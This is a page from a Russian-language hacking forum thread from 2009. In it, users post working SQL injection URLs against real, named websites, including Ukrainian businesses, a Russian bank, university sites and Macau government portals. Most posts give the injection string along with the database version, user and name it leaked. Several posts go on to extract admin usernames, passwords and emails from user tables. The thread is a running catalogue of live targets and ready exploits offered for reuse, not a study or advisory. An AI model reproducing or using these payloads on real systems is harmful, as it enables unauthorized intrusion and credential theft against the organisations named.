ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10751  
Старый 20.09.2009, 22:52
Аватар для Slavuti4
Slavuti4
Постоянный
Регистрация: 22.01.2009
Сообщений: 435
Провел на форуме:
3494588

Репутация: 1343
По умолчанию

www.ckhi.com.ua
ТИЦ:10
PHP код:
http://www.ckhi.com.ua/showdir.php?dir_code=-25+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7 
Version():4.1.22-standard
User():ckhi_db01@213.186.117.118
Database():ckhi_db01



www.buderotic.com
ТИЦ:10
PR:2
PHP код:
http://www.buderotic.com/shop.php?type=-5+union+select+concat_ws(0x3a,version(),user(),database()),2,3 
Version():5.0.85
User():buderoti_site@localhost
Database():buderoti_buderotic



www.centerpack.com.ua
ТИЦ:60
PR:2
PHP код:
http://www.centerpack.com.ua/news.php?item_id=-1+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10 
Version():4.1.22-standard
User():centerpa_r@localhost
Database():centerpa_builder



www.marlin-yug.com
PR:4
PHP код:
http://www.marlin-yug.com/shownews.php?news_id=-32+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7 
Version():5.0.67-community
User():marlin_db1@localhost
Database():marlin_db1
 
Ответить с цитированием

  #10752  
Старый 21.09.2009, 11:54
Аватар для TELO
TELO
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123

Репутация: 122
Отправить сообщение для TELO с помощью ICQ
По умолчанию

Код:
http://www.business-region.com.ua/index_main.php?p=52&du=-5727 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 --
version || 4.1.22-standard-log
 
Ответить с цитированием

  #10753  
Старый 21.09.2009, 18:27
Аватар для Rubaka
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

Русь-Банк-Урал

http://www.kbdu.ru/page.php?p=1306+and+(select+substring(version(),1, 1))=5

банк!

Последний раз редактировалось Rubaka; 21.09.2009 в 18:29..
 
Ответить с цитированием

  #10754  
Старый 21.09.2009, 19:18
Аватар для ReduKToR
ReduKToR
Постоянный
Регистрация: 05.01.2009
Сообщений: 684
Провел на форуме:
3281634

Репутация: 485


Отправить сообщение для ReduKToR с помощью ICQ
По умолчанию

http://las.arts.ubc.ca/las4/people.php?people=-6+UNION+SELECT+1,2,version(),4,5,6,7/*
4.0.17-standard 2

искал багу чисто изза названия домена..........
 
Ответить с цитированием

  #10755  
Старый 21.09.2009, 20:36
Аватар для Dyxxx
Dyxxx
Участник форума
Регистрация: 16.02.2009
Сообщений: 191
Провел на форуме:
879928

Репутация: 438
По умолчанию

stevens.usc.edu pr6
USC Stevens Institute for Innovation
Код:
http://stevens.usc.edu/playvideo.php?v=null union select null,null,null,null,concat_ws(0x2f,0x3C7363726970743E616C6572742827,version(),user(),database(),0x27293C2F7363726970743E),null,null,null,null,null,null,null,null,null
http://stevens.usc.edu/playvideo.php?v=null union select null,null,null,null,concat(user_login,0x2f,user_password,0x2f,users_levels_id),null,null,null,null,null,null,null,null,null FROM praxis_uscstevens.users limit 0,1
5.0.22/uscstevens@localhost/praxis_uscstevens

Последний раз редактировалось Dyxxx; 22.09.2009 в 05:17..
 
Ответить с цитированием

  #10756  
Старый 21.09.2009, 21:00
Аватар для Shadrin
Shadrin
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171

Репутация: 270
Отправить сообщение для Shadrin с помощью ICQ
По умолчанию

пр5
Код:
http://www.ihm.gov.mo/en/about/news_detail.php?id=-27+UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5--
ihmsql@localhost : ihm : 5.1.16-beta
Код:
http://www.sport.gov.mo/web/en/news/details.php?id=-1235+and+1=0+Union Select  1 ,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--
idm@localhost : IDM2 : 4.0.27-standard-log

Последний раз редактировалось Shadrin; 21.09.2009 в 22:35..
 
Ответить с цитированием

  #10757  
Старый 21.09.2009, 22:58
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
http://www.marschen.se/viewpage.php?page=-1+union+select+concat_ws(0x3a,version(),user(),dat abase())+--+
version()- 4.1.22-standard
user() - marschen_marsche@localhost
database() - marschen_iylpublisher
 
Ответить с цитированием

  #10758  
Старый 22.09.2009, 09:56
Аватар для Rubaka
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

http://adamov-web.ru/web.php?id=1+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYP T(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F 2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E 6A656E64),0x71),0x71),3

Database Version: 5.0.26-log
Database name: vyazantiya
User name: vyazantiya@localhost
 
Ответить с цитированием

  #10759  
Старый 22.09.2009, 11:57
Аватар для DezMond™
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

http://rupeetalk.com/more_review.php?product_id=6&product_item_id=-15+union+select+concat_ws(0x3a3a,admin_id,name,ema il_id,password,roll_type)+from+rupee_admin_user+/*+&ext=gif&bank_id=17

http://www.gumagumalu.com/recipes/recipe.html?rid=-2039+union+select+1,2,3,4,5,6,7,8,9,10,11+--+


http://www.onlinerealtysales.com/p/p/reviews/more_review.php?review=-13692'+union+select+1,2,3,concat_ws(0x3a3a,id,leve l,username,password,email),5,6,7,8,9,10,11,12,13,1 4,15+from+lore_users+--+&site=1028160064

http://www.swamijobs.com/showjob.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,concat_ws(0x3a3a,id,emp_i d,uname,passwd,email,team,level,status,lastlogin,l ogincount),25,26,27+from+authuser+limit+3,1+--+
 
Ответить с цитированием

  #10760  
Старый 22.09.2009, 14:03
Аватар для Skofield
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

Код:
http://wminyc.org/event.php?id=-875+union+select+1,2,3,4,5,6,7,8,9,version(),1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,74/*
Database Version: 4.1.25-Debian_mt1-log
Database name: worldmusicinstitute_org_-_ucms
User name: worldmusicinst@64.13.192.35
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ